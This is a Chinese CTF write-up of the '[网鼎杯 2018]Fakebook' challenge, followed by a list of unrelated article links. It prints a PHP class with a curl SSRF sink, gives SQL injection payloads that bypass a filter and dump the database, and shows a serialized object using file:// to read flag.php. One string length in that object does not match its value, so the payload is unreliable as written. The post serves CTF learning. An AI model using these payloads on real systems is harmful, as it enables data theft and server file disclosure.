当前位置: 首页 > news >正文

[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

 打开环境出现一个登录注册的页面        

在登录和注册中发现 了地址栏出现变化,扫一波看看

898e260f778946408418a2ffc458e78d.png

 5465e8d10b97457b8978ec2e8c1d446d.png

看看robots.txt和flag.php    访问robots.txt看看

cd295b0ee383403481cedbd26c4eea04.png

再访问user.php.bak

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

 想起来刚刚有一个注册的,先注册一个看看

填的时候可以随便复制一篇内容过去看看,这样才能进行注册

f820601849ad47bfa1497fbcc1a8e7e0.png

并且发现一个注入点,尝试一下简单的注入

order by 4#     页面回显正常

order by 5#     页面回显不正常

说明有四个字段

union查看显位

?no=1 union select 1,2,3,4#                  no hack ~_~
?no=1 ununionion seselectlect database();    no
?no=1 uNion sElEct database();               no
?no=1 union/**/select 1,2,3,4#               yes
?no=0 union/**/select 1,database(),3,4#      yes
 

测试中发现过滤了空格

17799aa32ecd4ea29015c6662756c213.png

回显的位置是2

库表字段内容

爆库:?no=-1 union/**/select 1,database(),3,4#
报表:?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#
爆字段:?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users' #
爆data值:?no=-1 union/**/select 1,group_concat(data),3,4 from users #

26037424baaa45f8ab6814e4a0d58fa9.png

 1b1c52b29b8f4c44bdf38ecaffe7541b.png

以为会出现内容,但是发现没有结果,得到了一串序列化的字符串

刚刚的提到的.bak文件,这个应该会和刚刚的有关

发现在get方法中,curl_exec()如果使用不当就会导致ssrf漏洞

有一个UserInfo的类,类中有三个公共的类变量:name,age,blog。一个构造方法,一个get方法。主要的工作应该是建立会话,然后判断是否是有效的请求,如果不是则返回404,如果不是则返回url的内容,一个getBlogContents方法,返回一个url的内容。

可以用file协议利用ssrf漏洞读取文件,再通过序列化去读取flag.php

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:83:"file:///var/www/html/flag.php";}'#

afe8af24987942d398b882d137cfcb6a.png

出现view.php

15292e041f974f87bf491334b11c96f7.png

 

 

 

http://www.lryc.cn/news/239714.html

相关文章:

  • 微信小程序蓝牙连接 uniApp蓝牙连接设备
  • 启动Dubbo项目注册Zookeeper时提示zookeeper not connected异常原理解析
  • 我在Vscode学OpenCV 几何变换(缩放、翻转、仿射变换、透视、重映射)
  • MATLAB算法实战应用案例精讲-【图像处理】图像缩放
  • Doris的PROPERTIES与ENGINE(九)
  • 华为云数据库 RDS 下载全量备份文件 wget
  • C#使用whisper.net实现语音识别(语音转文本)
  • 从零开始学习typescript——运算符(算术运算符、赋值运算符、比较运算符)
  • likeshop单商户商城系统 任意文件上传漏洞复现
  • CentOS 7 使用pugixml 库
  • 深度学习 loss 是nan的可能原因
  • [ 云计算 | AWS 实践 ] 基于 Amazon S3 协议搭建个人云存储服务
  • 第二十章:多线程
  • CentOS 7启动时报“Started Crash recovery kernel arming.....shutdown....”问题处理过程
  • Android 13 - Media框架(14)- OpenMax(二)
  • 【Python大数据笔记_day11_Hadoop进阶之MR和YARNZooKeeper】
  • 飞桨——总结PPOCRLabel中遇到的坑
  • LeetCode(30)长度最小的子数组【滑动窗口】【中等】
  • Niushop 开源商城 v5.1.7:支持PC、手机、小程序和APP多端电商的源码
  • Navmesh 寻路
  • YOLOv5 分类模型 数据集加载 3
  • 『亚马逊云科技产品测评』活动征文|AWS 存储产品类别及其适用场景详细说明
  • Mac | Vmware Fusion | 分辨率自动还原问题解决
  • SQL知多少?这篇文章让你从小白到入门
  • centos7安装MySQL—以MySQL5.7.30为例
  • 3.计算机网络补充
  • 【云原生】Spring Cloud Alibaba 之 Gateway 服务网关实战开发
  • opencv-直方图均衡化
  • npm install安装报错
  • Spring Boot创建和使用(重要)